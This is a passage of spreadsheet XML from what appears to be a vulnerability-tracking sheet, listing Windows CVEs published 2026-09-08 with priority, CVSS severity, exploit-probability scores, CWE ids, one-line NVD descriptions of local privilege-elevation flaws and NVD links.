      </c>
      <c r="G1429" s="5" t="inlineStr"/>
      <c r="H1429" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1429" s="5" t="inlineStr"/>
      <c r="J1429" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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29" s="5" t="inlineStr"/>
      <c r="M1429" s="5" t="inlineStr"/>
      <c r="N1429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1429" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1429" s="5" t="inlineStr"/>
      <c r="Q1429" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1429" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t>
        </is>
      </c>
    </row>
    <row r="1430">
      <c r="A1430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1430" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69896</t>
        </is>
      </c>
      <c r="D1430" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1430" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1430" s="5" t="inlineStr"/>
      <c r="H1430" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1430" s="5" t="inlineStr"/>
      <c r="J1430" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1430" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1430" s="5" t="inlineStr"/>
      <c r="M1430" s="5" t="inlineStr"/>
      <c r="N1430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1430" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1430" s="5" t="inlineStr"/>
      <c r="Q1430" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1430" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t>
        </is>
      </c>
    </row>
    <row r="1431">
      <c r="A1431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1431" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69911</t>
        </is>
      </c>
      <c r="D1431" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1431" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1431" s="5" t="inlineStr"/>
      <c r="H1431" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1431" s="5" t="inlineStr"/>
      <c r="J1431" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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1" s="5" t="inlineStr"/>
      <c r="M1431" s="5" t="inlineStr"/>
      <c r="N1431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1431" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1431" s="5" t="inlineStr"/>
      <c r="Q1431" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1431" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t>
        </is>
      </c>
    </row>
    <row r="1432">
      <c r="A1432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1432" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70283</t>
        </is>
      </c>
      <c r="D1432" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1432" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1432" s="5" t="inlineStr"/>
      <c r="H1432" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1432" s="5" t="inlineStr"/>
      <c r="J1432" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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2" s="5" t="inlineStr"/>
      <c r="M1432" s="5" t="inlineStr"/>
      <c r="N1432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1432" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1432" s="5" t="inlineStr"/>
      <c r="Q1432" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1432" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t>
        </is>
      </c>
    </row>
    <row r="1433">
      <c r="A1433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1433" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70562</t>
        </is>
      </c>
      <c r="D1433" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1433" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1433" s="5" t="inlineStr"/>
      <c r="H1433" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1433" s="5" t="inlineStr"/>
      <c r="J1433" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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3" s="5" t="inlineStr"/>
      <c r="M1433" s="5" t="inlineStr"/>
      <c r="N1433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1433" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1433" s="5" t="inlineStr"/>
      <c r="Q1433" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R1433" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t>
        </is>
      </c>
    </row>
    <row r="1434">
      <c r="A1434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1434" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70565</t>
        </is>
      </c>
      <c r="D1434" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1434" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1434" s="5" t="inlineStr"/>
      <c r="H1434" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1434" s="5" t="inlineStr"/>
      <c r="J1434" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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4" s="5" t="inlineStr"/>
      <c r="M1434" s="5" t="inlineStr"/>
      <c r="N1434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1434" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1434" s="5" t="inlineStr"/>
      <c r="Q1434" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1434" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t>
        </is>
      </c>
    </row>
    <row r="1435">
      <c r="A1435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1435" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70567</t>
        </is>
      </c>
      <c r="D1435" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1435" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1435" s="5" t="inlineStr"/>
      <c r="H1435" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1435" s="5" t="inlineStr"/>
      <c r="J1435" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1435" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1435" s="5" t="inlineStr"/>
      <c r="M1435" s="5" t="inlineStr"/>
      <c r="N1435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1435" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1435" s="5" t="inlineStr"/>
      <c r="Q1435" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R1435" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t>
        </is>
      </c>
    </row>
    <row r="1436">
      <c r="A1436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70568</t>
        </is>
      </c>
      <c r="D1436" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1436" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1436" s="5" t="inlineStr"/>
      <c r="H1436" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1436" s="5" t="inlineStr"/>
      <c r="J1436" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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6" s="5" t="inlineStr"/>
      <c r="M1436" s="5" t="inlineStr"/>
      <c r="N1436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1436" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1436" s="5" t="inlineStr"/>
      <c r="Q1436" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1436" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t>
        </is>
      </c>
    </row>
    <row r="1437">
      <c r="A1437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70573</t>
        </is>
      </c>
      <c r="D1437" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1437" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1437" s="5" t="inlineStr"/>
      <c r="H1437" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1437" s="5" t="inlineStr"/>
      <c r="J1437" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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37" s="5" t="inlineStr"/>
      <c r="M1437" s="5" t="inlineStr"/>
      <c r="N1437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1437" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1437" s="5" t="inlineStr"/>
      <c r="Q1437" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R1437" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t>
        </is>
      </c>
    </row>
    <row r="1438">
      <c r="A1438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1438" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70577</t>
        </is>
      </c>
      <c r="D1438" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1438" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1438" s="5" t="inlineStr"/>
      <c r="H1438" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1438" s="5" t="inlineStr"/>
      <c r="J1438" s="5" t="inlineStr"/>
      <c r="K1438" s="5" t="inlineStr"/>
      <c r="L1438" s="5" t="inlineStr"/>
      <c r="M1438" s="5" t="inlineStr"/>
      <c r="N1438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1438" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1438" s="5" t="inlineStr"/>
      <c r="Q1438" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1438" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70577</t>
        </is>
      </c>
    </row>
    <row r="1439">
      <c r="A1439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1439" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70578</t>
        </is>
      </c>
      <c r="D1439" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1439" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1439" s="5" t="inlineStr"/>
      <c r="H1439" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1439" s="5" t="inlineStr"/>
      <c r="J1439" s="5" t="inlineStr"/>
      <c r="K1439" s="5" t="inlineStr"/>
      <c r="L1439" s="5" t="inlineStr"/>
      <c r="M1439" s="5" t="inlineStr"/>
      <c r="N1439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1439" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1439" s="5" t="inlineStr"/>
      <c r="Q1439" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1439" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70578</t>
        </is>
      </c>
    </row>
    <row r="1440">
      <c r="A1440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1440" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70585</t>
        </is>
      </c>
      <c r="D1440" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1440" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1440" s="5" t="inlineStr"/>
      <c r="H1440" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1440" s="5" t="inlineStr"/>
      <c r="J1440" s="5" t="inlineStr"/>
      <c r="K1440" s="5" t="inlineStr"/>
      <c r="L1440" s="5" t="inlineStr"/>
      <c r="M1440" s="5" t="inlineStr"/>
      <c r="N1440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1440" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1440" s="5" t="inlineStr"/>
      <c r="Q1440" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1440" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S1440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70585</t>
        </is>
      </c>
    </row>
    <row r="1441">
      <c r="A1441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1441" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71332</t>
        </is>
      </c>
      <c r="D1441" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1441" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1441" s="5" t="inlineStr"/>
      <c r="H1441" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1441" s="5" t="inlineStr"/>
      <c r="J1441" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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41" s="5" t="inlineStr"/>
      <c r="M1441" s="5" t="inlineStr"/>
      <c r="N1441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1441" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1441" s="5" t="inlineStr"/>
      <c r="Q1441" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1441" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t>
        </is>
      </c>
    </row>
    <row r="1442">
      <c r="A1442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1442" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71333</t>
        </is>
      </c>
      <c r="D1442" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1442" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1442" s="5" t="inlineStr"/>
      <c r="H1442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1442" s="5" t="inlineStr"/>
      <c r="J1442" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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2" s="5" t="inlineStr"/>
      <c r="M1442" s="5" t="inlineStr"/>
      <c r="N1442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1442" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1442" s="5" t="inlineStr"/>
      <c r="Q1442" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1442" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t>
        </is>
      </c>
    </row>
    <row r="1443">
      <c r="A1443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1443" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71340</t>
        </is>
      </c>
      <c r="D1443" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1443" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1443" s="5" t="inlineStr"/>
      <c r="H1443" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1443" s="5" t="inlineStr"/>
      <c r="J1443" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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43" s="5" t="inlineStr"/>
      <c r="M1443" s="5" t="inlineStr"/>
      <c r="N1443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1443" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1443" s="5" t="inlineStr"/>
      <c r="Q1443" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1443" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71340</t>
        </is>
      </c>
    </row>
    <row r="1444">
      <c r="A1444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1444" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71342</t>
        </is>
      </c>
      <c r="D1444" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1444" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1444" s="5" t="inlineStr"/>
      <c r="H1444" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1444" s="5" t="inlineStr"/>
      <c r="J1444" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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44" s="5" t="inlineStr"/>
      <c r="M1444" s="5" t="inlineStr"/>
      <c r="N1444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1444" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1444" s="5" t="inlineStr"/>
      <c r="Q1444" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1444" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71342</t>
        </is>
      </c>
    </row>
    <row r="1445">
      <c r="A1445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1445" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71351</t>
        </is>
      </c>
      <c r="D1445" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1445" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1445" s="5" t="inlineStr"/>
      <c r="H1445" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1445" s="5" t="inlineStr"/>
      <c r="J1445" s="5" t="inlineStr"/>
      <c r="K1445" s="5" t="inlineStr"/>
      <c r="L1445" s="5" t="inlineStr"/>
      <c r="M1445" s="5" t="inlineStr"/>
      <c r="N1445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1445" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1445" s="5" t="inlineStr"/>
      <c r="Q1445" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R1445" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71351</t>
        </is>
      </c>
    </row>
    <row r="1446">
      <c r="A1446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1446" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71353</t>
        </is>
      </c>
      <c r="D1446" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1446" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1446" s="5" t="inlineStr"/>
      <c r="H1446" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1446" s="5" t="inlineStr"/>
      <c r="J1446" s="5" t="inlineStr"/>
      <c r="K1446" s="5" t="inlineStr"/>
      <c r="L1446" s="5" t="inlineStr"/>
      <c r="M1446" s="5" t="inlineStr"/>
      <c r="N1446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1446" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1446" s="5" t="inlineStr"/>
      <c r="Q1446" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R1446" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71353</t>
        </is>
      </c>
    </row>
    <row r="1447">
      <c r="A1447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1447" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72926</t>
        </is>
      </c>
      <c r="D1447" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1447" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1447" s="5" t="inlineStr"/>
      <c r="H1447" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1447" s="5" t="inlineStr"/>
      <c r="J1447" s="5" t="inlineStr"/>
      <c r="K1447" s="5" t="inlineStr"/>
